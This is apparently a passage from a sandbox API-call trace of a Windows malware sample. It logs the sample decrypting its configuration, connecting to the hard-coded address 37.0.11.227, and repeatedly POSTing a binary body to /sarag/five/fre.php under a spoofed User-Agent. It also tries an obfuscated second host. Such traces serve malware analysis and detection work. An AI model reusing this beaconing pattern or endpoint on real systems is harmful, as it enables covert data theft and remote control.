(lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0203.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.910] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0203.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.911] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0203.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0203.911] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0203.911] GetProcessHeap () returned 0x690000 [0203.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0203.912] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adec8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0203.912] GetProcessHeap () returned 0x690000 [0203.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0203.912] socket (af=2, type=1, protocol=6) returned 0x468 [0203.912] connect (s=0x468, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0203.941] FreeAddrInfoW (pAddrInfo=0x6adec8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0203.941] GetProcessHeap () returned 0x690000 [0203.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0203.941] GetProcessHeap () returned 0x690000 [0203.941] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b37c0 [0203.942] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.943] wvsprintfA (in: param_1=0x6b37c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0203.943] GetProcessHeap () returned 0x690000 [0203.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0203.943] GetProcessHeap () returned 0x690000 [0203.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.943] GetProcessHeap () returned 0x690000 [0203.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0203.943] GetProcessHeap () returned 0x690000 [0203.943] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b37c0 [0203.944] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0203.945] wvsprintfA (in: param_1=0x6b37c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0203.945] GetProcessHeap () returned 0x690000 [0203.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a9f58 [0203.945] GetProcessHeap () returned 0x690000 [0203.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b37c0 | out: hHeap=0x690000) returned 1 [0203.946] send (s=0x468, buf=0x6a9f58*, len=242, flags=0) returned 242 [0203.946] send (s=0x468, buf=0x6aba40*, len=159, flags=0) returned 159 [0203.946] GetProcessHeap () returned 0x690000 [0203.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0203.947] recv (in: s=0x468, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0204.014] GetProcessHeap () returned 0x690000 [0204.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0204.016] GetProcessHeap () returned 0x690000 [0204.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.016] GetProcessHeap () returned 0x690000 [0204.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0204.017] GetProcessHeap () returned 0x690000 [0204.017] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0204.017] closesocket (s=0x468) returned 0 [0204.018] GetProcessHeap () returned 0x690000 [0204.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0204.018] GetProcessHeap () returned 0x690000 [0204.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.018] GetProcessHeap () returned 0x690000 [0204.018] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.018] GetProcessHeap () returned 0x690000 [0204.019] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.022] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfe4) returned 0x468 [0204.023] Sleep (dwMilliseconds=0xea60) [0204.024] GetProcessHeap () returned 0x690000 [0204.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0204.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0204.037] GetProcessHeap () returned 0x690000 [0204.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0204.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.038] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.039] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.040] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.040] GetProcessHeap () returned 0x690000 [0204.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0204.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.041] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0204.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.042] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.043] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0204.043] GetProcessHeap () returned 0x690000 [0204.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.044] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.045] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.046] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.047] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.047] GetProcessHeap () returned 0x690000 [0204.047] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.047] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.047] GetProcessHeap () returned 0x690000 [0204.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.047] GetProcessHeap () returned 0x690000 [0204.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.052] GetProcessHeap () returned 0x690000 [0204.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.053] GetProcessHeap () returned 0x690000 [0204.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.057] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0204.065] GetProcessHeap () returned 0x690000 [0204.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0204.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.066] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0204.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.067] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.068] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.068] GetProcessHeap () returned 0x690000 [0204.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0204.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.069] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.071] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0204.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.072] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0204.072] GetProcessHeap () returned 0x690000 [0204.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.073] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0204.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.074] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0204.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.075] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0204.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.076] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0204.076] GetProcessHeap () returned 0x690000 [0204.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.076] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0204.076] GetProcessHeap () returned 0x690000 [0204.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0204.076] socket (af=2, type=1, protocol=6) returned 0x46c [0204.076] connect (s=0x46c, name=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0204.102] FreeAddrInfoW (pAddrInfo=0x6ad9a0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0204.102] GetProcessHeap () returned 0x690000 [0204.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0204.102] GetProcessHeap () returned 0x690000 [0204.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0204.104] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.105] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.105] GetProcessHeap () returned 0x690000 [0204.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0204.105] GetProcessHeap () returned 0x690000 [0204.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.106] GetProcessHeap () returned 0x690000 [0204.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0204.106] GetProcessHeap () returned 0x690000 [0204.106] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0204.108] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0204.110] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.110] GetProcessHeap () returned 0x690000 [0204.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a9f58 [0204.110] GetProcessHeap () returned 0x690000 [0204.111] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0204.112] send (s=0x46c, buf=0x6a9f58*, len=242, flags=0) returned 242 [0204.112] send (s=0x46c, buf=0x6aba40*, len=159, flags=0) returned 159 [0204.116] GetProcessHeap () returned 0x690000 [0204.116] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b37c0 [0204.116] recv (in: s=0x46c, buf=0x6b37c0, len=4048, flags=0 | out: buf=0x6b37c0*) returned 204 [0204.189] GetProcessHeap () returned 0x690000 [0204.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0204.192] GetProcessHeap () returned 0x690000 [0204.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.192] GetProcessHeap () returned 0x690000 [0204.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0204.193] GetProcessHeap () returned 0x690000 [0204.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0204.193] closesocket (s=0x46c) returned 0 [0204.194] GetProcessHeap () returned 0x690000 [0204.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0204.194] GetProcessHeap () returned 0x690000 [0204.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0204.194] GetProcessHeap () returned 0x690000 [0204.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0204.194] GetProcessHeap () returned 0x690000 [0204.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.195] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b37c0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x658) returned 0x46c [0204.196] Sleep (dwMilliseconds=0xea60) [0204.198] GetProcessHeap () returned 0x690000 [0204.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0204.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.199] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0204.212] GetProcessHeap () returned 0x690000 [0204.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0204.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.214] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0204.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.216] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.217] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.217] GetProcessHeap () returned 0x690000 [0204.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0204.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.219] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0204.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.220] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0204.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.221] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0204.221] GetProcessHeap () returned 0x690000 [0204.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0204.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.223] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.224] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.225] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.226] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.226] GetProcessHeap () returned 0x690000 [0204.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.226] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.226] GetProcessHeap () returned 0x690000 [0204.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0204.229] GetProcessHeap () returned 0x690000 [0204.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0204.230] GetProcessHeap () returned 0x690000 [0204.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0204.230] GetProcessHeap () returned 0x690000 [0204.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0204.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0204.243] GetProcessHeap () returned 0x690000 [0204.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0204.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.245] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0204.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.246] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.247] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.247] GetProcessHeap () returned 0x690000 [0204.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0204.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.248] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0204.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.249] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0204.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0204.250] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0204.250] GetProcessHeap () returned 0x690000 [0204.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0204.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.251] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0204.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.252] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0204.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.253] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0204.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0204.253] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0204.253] GetProcessHeap () returned 0x690000 [0204.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0204.253] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2a88*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8b0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0204.254] GetProcessHeap () returned 0x690000 [0204.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 